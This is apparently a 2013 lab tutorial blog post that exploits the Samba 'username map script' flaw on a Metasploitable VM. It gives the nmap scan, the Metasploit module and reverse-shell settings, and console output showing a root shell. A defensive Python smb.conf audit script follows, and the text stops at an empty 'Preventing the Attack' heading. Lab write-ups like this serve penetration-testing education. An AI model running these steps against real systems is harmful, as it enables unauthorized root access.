Tuesday, May 14, 2013

Hi again!

On to another post in our "Exploiting Metasploitable" series. In this post we will exploit a vulnerability in Samba and use it to get root access to the system.





What will we need?


  • A victim running a vulnerable version of Samba
  • A pentest distro with the Metasploit Framework
  • Nmap or another port scanner


Locating the target


First of all, let's find where on the network the victim is. For that we use nmap:


attacker@blackoutlabs:~# nmap -sV 192.168.0.1/24

One of the results should look like the following:


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-11 19:18 BRT
Nmap scan report for 192.168.0.100
Host is up (0.0014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds


Notice (highlighted in red) Samba running on ports 139 and 445. Yes, the same ports as the famous ms08_067_netapi, which exploits a vulnerability in the same service, but only on Windows XP (I have heard rumors of people who succeeded on Vista/7).


Exploiting


With the IP in hand, let's start Metasploit and search for our exploit.


attacker@blackoutlabs:~# msfconsole

[msfconsole ASCII-art banner]

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 938 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search samba

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
exploit/freebsd/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 00:00:00 UTC good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 00:00:00 UTC average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 00:00:00 UTC excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 00:00:00 UTC normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 00:00:00 UTC average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations


Again, we will use the module highlighted in red and look at its options:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:

Id Name
-- ----
0 Automatic

As you can see, the exploit is extremely simple: we only need to supply the victim's IP and port, and the attacker's (the payload, further on). Let's fill in that information and run the exploit to see what happens...


msf exploit(usermap_script) > set RHOST 192.168.0.100
RHOST => 192.168.0.100

msf exploit(usermap_script) > set RPORT 445
RPORT => 445

msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.100 yes The target address
RPORT 445 yes The target port
Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Y9MlnoVTPC9oq8TG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Y9MlnoVTPC9oq8TG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.0.106:4444 -> 192.168.0.100:51565) at 2012-09-11 19:20:41 -0300

ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:45:2c:e8
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe45:2ce8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3127 errors:0 dropped:0 overruns:0 frame:0
TX packets:2306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216601 (211.5 KB) TX bytes:154677 (151.0 KB)
Interrupt:16 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:94 errors:0 dropped:0 overruns:0 frame:0
TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47217 (46.1 KB) TX bytes:47217 (46.1 KB)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

id
uid=0(root) gid=0(root)

whoami
root

OWNED!!!
sh: OWNED!!!: not found


And there it is. I ran a few commands to confirm I was on the machine and to make sure I was root.
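The module used above abuses Samba's "username map script" option, which hands the client-supplied username to an external command. As an added example (not code from the original post), this Python audit parses an smb.conf and reports every section that enables the option; the sample configuration and the script path in it are constructed for illustration.

```python
"""Audit an smb.conf for the 'username map script' option (added example)."""
import re

# Constructed sample smb.conf; the mapping script path is invented.
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   ; maps incoming names through an external command
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[print$]
   path = /var/lib/samba/printers
   browseable = yes

[tmp]
   path = /tmp
   writeable = yes
   guest ok = yes
"""


def normalize_key(key):
    """Samba ignores case and whitespace in parameter names."""
    return re.sub(r"\s+", "", key).lower()


def parse_smb_conf(text):
    """Return {section: {normalized_key: value}} for an smb.conf body."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][normalize_key(key)] = value.strip()
    return sections


def audit(text):
    """List (section, command) pairs where 'username map script' is set."""
    return [(section, params["usernamemapscript"])
            for section, params in parse_smb_conf(text).items()
            if params.get("usernamemapscript")]


if __name__ == "__main__":
    for section, script in audit(SAMPLE_SMB_CONF):
        print(f"[{section}] username map script = {script}")
```

An empty result is the expected state on a hardened host; any hit names the section to review and the command Samba would run.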


Preventing the Attack
